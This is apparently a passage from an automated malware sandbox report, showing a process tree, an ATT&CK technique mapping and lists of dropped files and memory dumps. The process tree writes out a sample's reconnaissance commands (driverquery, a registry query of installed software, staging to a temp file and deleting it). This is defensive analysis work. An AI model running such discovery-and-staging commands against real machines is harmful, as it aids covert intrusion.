- C:\Windows\system32\cmd.exe
  cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\19AD.bin1"
  2⤵
  PID:2064
- - C:\Windows\system32\driverquery.exe
    driverquery.exe
    3⤵
    PID:1704
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\19AD.bin1"
  2⤵
  PID:844
- C:\Windows\system32\cmd.exe
  cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\19AD.bin1"
  2⤵
  PID:3520
- - C:\Windows\system32\reg.exe
    reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
    3⤵
    - Checks for installed software on the system
    PID:3488
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\19AD.bin1"
  2⤵
  PID:2336
- C:\Windows\system32\cmd.exe
  cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\19AD.bin1 > C:\Users\Admin\AppData\Local\Temp\19AD.bin & del C:\Users\Admin\AppData\Local\Temp\19AD.bin1"
  2⤵
  PID:4068

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3436

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:3916
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:82945 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Checks whether UAC is enabled
  - Suspicious use of SetWindowsHookEx
  PID:3936
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:82950 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Checks whether UAC is enabled
  - Suspicious use of SetWindowsHookEx
  PID:3704

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203

Download Submit
C:\Users\Admin\AppData\Local\Temp\19AD.bin

Download Submit
C:\Users\Admin\AppData\Local\Temp\19AD.bin1

Download Submit
C:\Users\Admin\AppData\Local\Temp\19AD.bin1

Download Submit
C:\Users\Admin\AppData\Local\Temp\19AD.bin1

Download Submit
C:\Users\Admin\AppData\Local\Temp\19AD.bin1

Download Submit
C:\Users\Admin\AppData\Local\Temp\19AD.bin1

Download Submit
C:\Users\Admin\AppData\Local\Temp\19AD.bin1

Download Submit
C:\Users\Admin\AppData\Local\Temp\19AD.bin1

Download Submit
C:\Users\Admin\AppData\Local\Temp\19AD.bin1

Download Submit
C:\Users\Admin\AppData\Local\Temp\19AD.bin1

Download Submit
C:\Users\Admin\AppData\Local\Temp\19AD.bin1

Download Submit
C:\Users\Admin\AppData\Local\Temp\19AD.bin1

Download Submit
C:\Users\Admin\AppData\Local\Temp\19AD.bin1

Download Submit
C:\Users\Admin\AppData\Local\Temp\3zhurldx\3zhurldx.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\411A.bi1

Download Submit
C:\Users\Admin\AppData\Local\Temp\411A.bi1

Download Submit
C:\Users\Admin\AppData\Local\Temp\418E.bi1

Download Submit
C:\Users\Admin\AppData\Local\Temp\418E.bi1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5F2D.tmp

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6008.tmp

Download Submit
C:\Users\Admin\AppData\Local\Temp\i2epcu0k\i2epcu0k.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmDvhuQzZOS.txt

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3zhurldx\3zhurldx.0.cs

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3zhurldx\3zhurldx.cmdline

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3zhurldx\CSCE38C92F59F4B4FAE82139A95B4939D2A.TMP

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i2epcu0k\CSC21640062A67B437E8C72141E358E19C4.TMP

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i2epcu0k\i2epcu0k.0.cs

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i2epcu0k\i2epcu0k.cmdline

Download Submit
\Users\Admin\AppData\Local\Temp\tmDvhuQzZOS.txt

Download Submit
memory/1236-26-0x000002B935090000-0x000002B935091000-memory.dmp

Filesize
4KB

Download
memory/2988-27-0x0000000002810000-0x00000000028C1000-memory.dmp

Filesize
708KB

Download
memory/2988-12-0x0000000000920000-0x0000000000921000-memory.dmp

Filesize
4KB

Download
memory/2988-15-0x0000000002810000-0x00000000028C1000-memory.dmp

Filesize
708KB

Download
memory/2988-17-0x0000000005030000-0x00000000050E1000-memory.dmp

Filesize
708KB

Download
memory/2988-19-0x0000000002810000-0x00000000028C1000-memory.dmp

Filesize
708KB

Download
memory/3436-14-0x00000237AB1D0000-0x00000237AB1D1000-memory.dmp

Filesize
4KB

Download
memory/3636-16-0x00000176D6120000-0x00000176D6121000-memory.dmp

Filesize
4KB

Download
memory/3636-21-0x00000176D83A0000-0x00000176D8451000-memory.dmp

Filesize
708KB

Download
memory/3812-13-0x0000020B3D430000-0x0000020B3D4E1000-memory.dmp

Filesize
708KB

Download
memory/3916-18-0x0000025EE40E0000-0x0000025EE40E1000-memory.dmp

Filesize
4KB

Download
memory/4068-20-0x0000022B79550000-0x0000022B79551000-memory.dmp

Filesize
4KB

Download